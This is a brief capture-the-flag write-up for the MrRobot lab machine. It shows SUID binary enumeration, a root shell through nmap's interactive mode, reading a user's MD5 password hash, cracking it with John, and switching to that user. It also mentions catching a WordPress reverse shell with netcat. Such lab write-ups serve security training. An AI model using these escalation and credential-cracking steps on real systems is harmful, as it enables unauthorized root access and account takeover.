Skip to main content

MrRobot

Privilege Escalation

We can catch the Reverse Shell from WordPress Using netcat

daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

The /usr/local/bin/nmap Binary has the SUID Bit Set.

daemon@linux ~$ find / -type f -perm -04000 -ls 2>/dev/null
    ...
    34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
    ...

Using NMAP to Escalate Privileges.

daemon@linux ~$ /usr/local/bin/nmap --interactive
nmap> !sh
daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
daemon@linux ~$ whoami
root

OTHER [ROBOT MD5 HASH]

In the Home Directory of the User robot there is an MD5 HASH.

daemon@linux ~$ ls -l /home/robot/
...
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
...
daemon@linux ~$ cat /home/robot/password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

JOHN

We can Brute-Force the HASH using John
Password: abcdefghijklmnopqrstuvwxyz

Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
abcdefghijklmnopqrstuvwxyz (?)

Switching User

After Cracking the HASH we can change our User to Robot
Username - Password: robot:abcdefghijklmnopqrstuvwxyz

robot@linux ~$  id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Privilege Escalation
OTHER [ROBOT MD5 HASH]
- JOHN
- Switching User